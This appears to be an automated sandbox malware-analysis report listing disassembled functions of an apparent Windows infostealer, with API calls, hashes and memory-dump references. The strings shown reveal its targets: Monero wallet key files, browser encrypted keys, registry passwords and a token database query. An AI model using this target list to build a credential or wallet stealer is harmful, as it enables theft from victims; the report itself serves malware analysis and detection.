                    • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                    • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                    • API String ID: 3240024479-1526165396
                    • Opcode ID: 5063cc6bc5948469121bd7f11e5f1d9a3a9b0501b35208099c6dcc8ad7b14a36
                    • Instruction ID: a31991900b624a52f424104c36300cebc71fa7037ceac1e958dd106e25276552
                    • Opcode Fuzzy Hash: 5063cc6bc5948469121bd7f11e5f1d9a3a9b0501b35208099c6dcc8ad7b14a36
                    • Instruction Fuzzy Hash: 0D512F309101499BCB14FF64CD96EEDB7B9EF10300F5044A9F80A6A292FF356B46DB66
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: same 14 dumps as listed under the first function above
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpylstrlen
                    • String ID:
                    • API String ID: 2001356338-0
                    • Opcode ID: d910c84edc357a83f433faf8f37762f0a0e47e3e9b3c1be71c94102fc43bf47a
                    • Instruction ID: d113ce2bc10693421bbe72178e9e95ff7e36d37dca428e027e163e6e5abad83e
                    • Opcode Fuzzy Hash: d910c84edc357a83f433faf8f37762f0a0e47e3e9b3c1be71c94102fc43bf47a
                    • Instruction Fuzzy Hash: A1C1A5B590021DABCB14EF60DC89FEAB3B8BB54304F0445E9E50A67251FA71AA85CF91
                    APIs
                      • Part of subcall function 00BD8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00BD8E0B
                    • lstrcat.KERNEL32(?,00000000), ref: 00BD42EC
                    • lstrcat.KERNEL32(?,013CE500), ref: 00BD430B
                    • lstrcat.KERNEL32(?,?), ref: 00BD431F
                    • lstrcat.KERNEL32(?,013CD470), ref: 00BD4333
                      • Part of subcall function 00BDA740: lstrcpy.KERNEL32(00BE0E17,00000000), ref: 00BDA788
                      • Part of subcall function 00BD8D90: GetFileAttributesA.KERNEL32(00000000,?,00BC1B54,?,?,00BE564C,?,?,00BE0E1F), ref: 00BD8D9F
                      • Part of subcall function 00BC9CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00BC9D39
                      • Part of subcall function 00BC99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00BC99EC
                      • Part of subcall function 00BC99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00BC9A11
                      • Part of subcall function 00BC99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00BC9A31
                      • Part of subcall function 00BC99C0: ReadFile.KERNEL32(000000FF,?,00000000,00BC148F,00000000), ref: 00BC9A5A
                      • Part of subcall function 00BC99C0: LocalFree.KERNEL32(00BC148F), ref: 00BC9A90
                      • Part of subcall function 00BC99C0: CloseHandle.KERNEL32(000000FF), ref: 00BC9A9A
                      • Part of subcall function 00BD93C0: GlobalAlloc.KERNEL32(00000000,00BD43DD,00BD43DD), ref: 00BD93D3
                    • StrStrA.SHLWAPI(?,013CE4B8), ref: 00BD43F3
                    • GlobalFree.KERNEL32(?), ref: 00BD4512
                      • Part of subcall function 00BC9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00BC4EEE,00000000,00000000), ref: 00BC9AEF
                      • Part of subcall function 00BC9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00BC4EEE,00000000,?), ref: 00BC9B01
                      • Part of subcall function 00BC9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00BC4EEE,00000000,00000000), ref: 00BC9B2A
                      • Part of subcall function 00BC9AC0: LocalFree.KERNEL32(?,?,?,?,00BC4EEE,00000000,?), ref: 00BC9B3F
                    • lstrcat.KERNEL32(?,00000000), ref: 00BD44A3
                    • StrCmpCA.SHLWAPI(?,00BE08D1), ref: 00BD44C0
                    • lstrcat.KERNEL32(00000000,00000000), ref: 00BD44D2
                    • lstrcat.KERNEL32(00000000,?), ref: 00BD44E5
                    • lstrcat.KERNEL32(00000000,00BE0FB8), ref: 00BD44F4
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: same 14 dumps as listed under the first function above
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                    • String ID:
                    • API String ID: 3541710228-0
                    • Opcode ID: 83254cc380fd9e511db36340d27498ec03dcd792993c67bb2ce0d08f179dc9d7
                    • Instruction ID: acc3a9f1aff61dd074b30fe4fec895d4041d714ad7cbd2ccbae623e23720ece4
                    • Opcode Fuzzy Hash: 83254cc380fd9e511db36340d27498ec03dcd792993c67bb2ce0d08f179dc9d7
                    • Instruction Fuzzy Hash: 3C713876910208ABDB14FBA0DC99FEE73B9AB48300F0485D9F505A7181EB75DB49CFA1
                    APIs
                      • Part of subcall function 00BC12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BC12B4
                      • Part of subcall function 00BC12A0: RtlAllocateHeap.NTDLL(00000000), ref: 00BC12BB
                      • Part of subcall function 00BC12A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00BC12D7
                      • Part of subcall function 00BC12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00BC12F5
                      • Part of subcall function 00BC12A0: RegCloseKey.ADVAPI32(?), ref: 00BC12FF
                    • lstrcat.KERNEL32(?,00000000), ref: 00BC134F
                    • lstrlen.KERNEL32(?), ref: 00BC135C
                    • lstrcat.KERNEL32(?,.keys), ref: 00BC1377
                      • Part of subcall function 00BDA740: lstrcpy.KERNEL32(00BE0E17,00000000), ref: 00BDA788
                      • Part of subcall function 00BDA9B0: lstrlen.KERNEL32(?,013C9238,?,\Monero\wallet.keys,00BE0E17), ref: 00BDA9C5
                      • Part of subcall function 00BDA9B0: lstrcpy.KERNEL32(00000000), ref: 00BDAA04
                      • Part of subcall function 00BDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BDAA12
                      • Part of subcall function 00BDA8A0: lstrcpy.KERNEL32(?,00BE0E17), ref: 00BDA905
                      • Part of subcall function 00BD8B60: GetSystemTime.KERNEL32(00BE0E1A,013CA5A0,00BE05AE,?,?,00BC13F9,?,0000001A,00BE0E1A,00000000,?,013C9238,?,\Monero\wallet.keys,00BE0E17), ref: 00BD8B86
                      • Part of subcall function 00BDA920: lstrcpy.KERNEL32(00000000,?), ref: 00BDA972
                      • Part of subcall function 00BDA920: lstrcat.KERNEL32(00000000), ref: 00BDA982
                    • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00BC1465
                      • Part of subcall function 00BDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BDA7E6
                      • Part of subcall function 00BC99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00BC99EC
                      • Part of subcall function 00BC99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00BC9A11
                      • Part of subcall function 00BC99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00BC9A31
                      • Part of subcall function 00BC99C0: ReadFile.KERNEL32(000000FF,?,00000000,00BC148F,00000000), ref: 00BC9A5A
                      • Part of subcall function 00BC99C0: LocalFree.KERNEL32(00BC148F), ref: 00BC9A90
                      • Part of subcall function 00BC99C0: CloseHandle.KERNEL32(000000FF), ref: 00BC9A9A
                    • DeleteFileA.KERNEL32(00000000), ref: 00BC14EF
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                    • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                    • API String ID: 3478931302-218353709
                    • Opcode ID: e12f80f8317a66523438d02ef66fd9e020f457210bf44b0ab63a93004fcd5ed8
                    • Instruction ID: 225826110e7e750243fe5f36904433aef5918891466f49c789dd3821c77e4c4b
                    • Opcode Fuzzy Hash: e12f80f8317a66523438d02ef66fd9e020f457210bf44b0ab63a93004fcd5ed8
                    • Instruction Fuzzy Hash: 905150B1D101195BCB15EB60DC92FEDB3BCAF50300F4045E9B60A72192FF716B89CAA6
                    APIs
                      • Part of subcall function 00BC72D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00BC733A
                      • Part of subcall function 00BC72D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00BC73B1
                      • Part of subcall function 00BC72D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00BC740D
                      • Part of subcall function 00BC72D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00BC7452
                      • Part of subcall function 00BC72D0: HeapFree.KERNEL32(00000000), ref: 00BC7459
                    • lstrcat.KERNEL32(00000000,00BE17FC), ref: 00BC7606
                    • lstrcat.KERNEL32(00000000,00000000), ref: 00BC7648
                    • lstrcat.KERNEL32(00000000, : ), ref: 00BC765A
                    • lstrcat.KERNEL32(00000000,00000000), ref: 00BC768F
                    • lstrcat.KERNEL32(00000000,00BE1804), ref: 00BC76A0
                    • lstrcat.KERNEL32(00000000,00000000), ref: 00BC76D3
                    • lstrcat.KERNEL32(00000000,00BE1808), ref: 00BC76ED
                    • task.LIBCPMTD ref: 00BC76FB
                    Strings
                    Yara matches
                    Similarity
                    • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                    • String ID: :
                    • API String ID: 2677904052-3653984579
                    • Opcode ID: 412661326116d97fda712449a0560979d3742490fe1cd3a5404e6b36c04da4fb
                    • Instruction ID: 694f929a4d5f5f2a5135a66533bbc8e3e4f912063ba900e3723885a0ab777a06
                    • Opcode Fuzzy Hash: 412661326116d97fda712449a0560979d3742490fe1cd3a5404e6b36c04da4fb
                    • Instruction Fuzzy Hash: 3B31E671900209DFCB08EBB5DC99EFE77F9BB54301B184568F102B7251DE35A986CB61
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,013CE338,00000000,?,00BE0E2C,00000000,?,00000000), ref: 00BD8130
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00BD8137
                    • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00BD8158
                    • __aulldiv.LIBCMT ref: 00BD8172
                    • __aulldiv.LIBCMT ref: 00BD8180
                    • wsprintfA.USER32 ref: 00BD81AC
                    Strings
                    Yara matches
                    Similarity
                    • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                    • String ID: %d MB$@
                    • API String ID: 2774356765-3474575989
                    • Opcode ID: 9504d7d6971364cbe8dd742f6a19eeed70556a7074c4b32fe71fd1e77e84b3ed
                    • Instruction ID: 16ade8e790a114cd82b33e0da1ae14af2cf5fbdb46007bee8eae0e8282019b6f
                    • Opcode Fuzzy Hash: 9504d7d6971364cbe8dd742f6a19eeed70556a7074c4b32fe71fd1e77e84b3ed
                    • Instruction Fuzzy Hash: C82158B1E44318ABDB00DFD5CC49FAEB7B8FB48B00F10465AF605BB280D77969058BA5
                    APIs
                      • Part of subcall function 00BDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BDA7E6
                      • Part of subcall function 00BC47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00BC4839
                      • Part of subcall function 00BC47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00BC4849
                    • InternetOpenA.WININET(00BE0DF7,00000001,00000000,00000000,00000000), ref: 00BC610F
                    • StrCmpCA.SHLWAPI(?,013CEA08), ref: 00BC6147
                    • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00BC618F
                    • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00BC61B3
                    • InternetReadFile.WININET(?,?,00000400,?), ref: 00BC61DC
                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00BC620A
                    • CloseHandle.KERNEL32(?,?,00000400), ref: 00BC6249
                    • InternetCloseHandle.WININET(?), ref: 00BC6253
                    • InternetCloseHandle.WININET(00000000), ref: 00BC6260
                    Yara matches
                    Similarity
                    • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                    • String ID:
                    • API String ID: 2507841554-0
                    • Opcode ID: 9e2355ae8da4f64122124c99cf478e871f49535d38821542615df859795bdb77
                    • Instruction ID: ebd2513730d8512142ac2d012343cf0d1d921f63d5889dd3a9ee52dab3879dec
                    • Opcode Fuzzy Hash: 9e2355ae8da4f64122124c99cf478e871f49535d38821542615df859795bdb77
                    • Instruction Fuzzy Hash: 4D514EB1900218AFDB20DF51DC49FEEB7B8EB44701F1480E9A605BB181EB756A89CF95
                    APIs
                    • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00BC733A
                    • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00BC73B1
                    • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00BC740D
                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00BC7452
                    • HeapFree.KERNEL32(00000000), ref: 00BC7459
                    • task.LIBCPMTD ref: 00BC7555
                    Strings
                    Yara matches
                    Similarity
                    • API ID: Heap$EnumFreeOpenProcessValuetask
                    • String ID: Password
                    • API String ID: 775622407-3434357891
                    • Opcode ID: e3ae01cb5dd7b81aaee0d5274edc9c217f5a02f0d3eb48b4425c8cca1948a5e2
                    • Instruction ID: e78161b3de86328f67b1748675c9a26e79eb0987c72add4f49eb6ec94a63f72c
                    • Opcode Fuzzy Hash: e3ae01cb5dd7b81aaee0d5274edc9c217f5a02f0d3eb48b4425c8cca1948a5e2
                    • Instruction Fuzzy Hash: 646109B59442689BDB24DB50DC85FDAB7F8BF48300F0481E9E689A6241DF705BC9CFA1
                    APIs
                      • Part of subcall function 00BDA740: lstrcpy.KERNEL32(00BE0E17,00000000), ref: 00BDA788
                      • Part of subcall function 00BDA9B0: lstrlen.KERNEL32(?,013C9238,?,\Monero\wallet.keys,00BE0E17), ref: 00BDA9C5
                      • Part of subcall function 00BDA9B0: lstrcpy.KERNEL32(00000000), ref: 00BDAA04
                      • Part of subcall function 00BDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BDAA12
                      • Part of subcall function 00BDA920: lstrcpy.KERNEL32(00000000,?), ref: 00BDA972
                      • Part of subcall function 00BDA920: lstrcat.KERNEL32(00000000), ref: 00BDA982
                      • Part of subcall function 00BDA8A0: lstrcpy.KERNEL32(?,00BE0E17), ref: 00BDA905
                      • Part of subcall function 00BDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BDA7E6
                    • lstrlen.KERNEL32(00000000), ref: 00BCBC9F
                      • Part of subcall function 00BD8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00BD8E52
                    • StrStrA.SHLWAPI(00000000,AccountId), ref: 00BCBCCD
                    • lstrlen.KERNEL32(00000000), ref: 00BCBDA5
                    • lstrlen.KERNEL32(00000000), ref: 00BCBDB9
                    Strings
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                    • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                    • API String ID: 3073930149-1079375795
                    • Opcode ID: 61ceb6a47249847b1e9f425352d176fa08313ab6f558805c280d48f0cd788a65
                    • Instruction ID: 3267bfb3aeed00f246737439a1e45988e6e395aa9f1adb7fc8c272dfac97a42a
                    • Opcode Fuzzy Hash: 61ceb6a47249847b1e9f425352d176fa08313ab6f558805c280d48f0cd788a65
                    • Instruction Fuzzy Hash: 12B142719101089BDF04FBA0DC96EEEB3B8AF14300F4445AAF506B2291FF356E49CB66
                    APIs
                    Strings
                    Yara matches
                    Similarity
                    • API ID: ExitProcess$DefaultLangUser
                    • String ID: *
                    • API String ID: 1494266314-163128923
                    • Opcode ID: 0ad4a5440f1ae83ac4a30d9ca47a3377a32bb3859bb685c061c9a6918856b3a8
                    • Instruction ID: 2922bc38a62bc565bd1e2a66725ed3b2cf6c853571a9b08597fed578f472ce87
                    • Opcode Fuzzy Hash: 0ad4a5440f1ae83ac4a30d9ca47a3377a32bb3859bb685c061c9a6918856b3a8
                    • Instruction Fuzzy Hash: 3AF0543090530DEFD3449FE1E90976CBB70FB04703F0C41AAE609A6291E6714F819B96
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00BC4FCA
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00BC4FD1
                    • InternetOpenA.WININET(00BE0DDF,00000000,00000000,00000000,00000000), ref: 00BC4FEA
                    • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00BC5011
                    • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00BC5041
                    • InternetCloseHandle.WININET(?), ref: 00BC50B9
                    • InternetCloseHandle.WININET(?), ref: 00BC50C6
                    Yara matches
                    Similarity
                    • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                    • String ID:
                    • API String ID: 3066467675-0
                    • Opcode ID: 458aa145ef887b80c8d108ed247ecc2cb2a58ca3ab0cbae46e781783ca7e3d3f
                    • Instruction ID: d600425146791bea78488f74e62bea9540d21c261d4d7cc10984d563059d03f0
                    • Opcode Fuzzy Hash: 458aa145ef887b80c8d108ed247ecc2cb2a58ca3ab0cbae46e781783ca7e3d3f
                    • Instruction Fuzzy Hash: 6431F5B4A0021CABDB20CF54DC85BDDB7B4EB48704F5481E9EA09B7281DB716AC58F99
                    APIs
                    • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00BD8426
                    • wsprintfA.USER32 ref: 00BD8459
                    • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00BD847B
                    • RegCloseKey.ADVAPI32(00000000), ref: 00BD848C
                    • RegCloseKey.ADVAPI32(00000000), ref: 00BD8499
                      • Part of subcall function 00BDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BDA7E6
                    • RegQueryValueExA.ADVAPI32(00000000,013CE218,00000000,000F003F,?,00000400), ref: 00BD84EC
                    • lstrlen.KERNEL32(?), ref: 00BD8501
                    • RegQueryValueExA.ADVAPI32(00000000,013CE230,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00BE0B34), ref: 00BD8599
                    • RegCloseKey.ADVAPI32(00000000), ref: 00BD8608
                    • RegCloseKey.ADVAPI32(00000000), ref: 00BD861A
                    Strings
                    Yara matches
                    Similarity
                    • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                    • String ID: %s\%s
                    • API String ID: 3896182533-4073750446
                    • Opcode ID: 7fc1e13175b36279349746bbc6188239af94fa54e4e187fea554fec4b5490020
                    • Instruction ID: 4c145dbd5371b2faeb5fe48107a7a24eb2ccfae41a5c1e99d4dcea913c70ea6f
                    • Opcode Fuzzy Hash: 7fc1e13175b36279349746bbc6188239af94fa54e4e187fea554fec4b5490020
                    • Instruction Fuzzy Hash: 0021D67191021CAFDB24DB54DC85FE9B3B8FB48711F04C5E9A609A6240DF71AA85CFA4
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BD76A4
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00BD76AB
                    • RegOpenKeyExA.ADVAPI32(80000002,013BC470,00000000,00020119,00000000), ref: 00BD76DD
                    • RegQueryValueExA.ADVAPI32(00000000,013CE200,00000000,00000000,?,000000FF), ref: 00BD76FE
                    • RegCloseKey.ADVAPI32(00000000), ref: 00BD7708
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                    • String ID: Windows 11
                    • API String ID: 3225020163-2517555085
                    • Opcode ID: 44483e605043ded2b5dd2fea2d3981699a158b5e99f0984680a7619e6d99ae4d
                    • Instruction ID: fb89d920e97dac546b48e450918d8616ed82fc2113f4c95e452e3d364bdc1737
                    • Opcode Fuzzy Hash: 44483e605043ded2b5dd2fea2d3981699a158b5e99f0984680a7619e6d99ae4d
                    • Instruction Fuzzy Hash: 7301A7B5A40308BFD700DBE5DC4DFADB7B8EB04700F0484A5FA04E7290FA7199448B61
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BD7734
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00BD773B
                    • RegOpenKeyExA.ADVAPI32(80000002,013BC470,00000000,00020119,00BD76B9), ref: 00BD775B
                    • RegQueryValueExA.ADVAPI32(00BD76B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00BD777A
                    • RegCloseKey.ADVAPI32(00BD76B9), ref: 00BD7784
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                    • String ID: CurrentBuildNumber
                    • API String ID: 3225020163-1022791448
                    • Opcode ID: cfbeb868ba9ec55e89fee9d614dda0286a56d9a00d8e632430b0930c1e699061
                    • Instruction ID: ad6b6da27c3867dcd51f292cf8bf259ed08c0ca6dbe21497a689de839acffff4
                    • Opcode Fuzzy Hash: cfbeb868ba9ec55e89fee9d614dda0286a56d9a00d8e632430b0930c1e699061
                    • Instruction Fuzzy Hash: EC01A7B5A4030CBFD700DBE1DC49FAEB7B8EB04700F0480A5FA04B7280EB7159448B61
                    APIs
                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00BC99EC
                    • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00BC9A11
                    • LocalAlloc.KERNEL32(00000040,?), ref: 00BC9A31
                    • ReadFile.KERNEL32(000000FF,?,00000000,00BC148F,00000000), ref: 00BC9A5A
                    • LocalFree.KERNEL32(00BC148F), ref: 00BC9A90
                    • CloseHandle.KERNEL32(000000FF), ref: 00BC9A9A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                    • String ID:
                    • API String ID: 2311089104-0
                    • Opcode ID: d1136b61e05c5e59f383d3e5b612a01b2e395771af158b28821702b68f6e27fc
                    • Instruction ID: b401fa325ae96b5e23e0a8b95b4dc380217054e076a71e6598919e7765d2b021
                    • Opcode Fuzzy Hash: d1136b61e05c5e59f383d3e5b612a01b2e395771af158b28821702b68f6e27fc
                    • Instruction Fuzzy Hash: FA31D574A00209EFDB14CF95D989FAE77F5FF48340F108198E911A7290D775A985CFA1
                    APIs
                    • lstrcat.KERNEL32(?,013CE500), ref: 00BD47DB
                      • Part of subcall function 00BD8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00BD8E0B
                    • lstrcat.KERNEL32(?,00000000), ref: 00BD4801
                    • lstrcat.KERNEL32(?,?), ref: 00BD4820
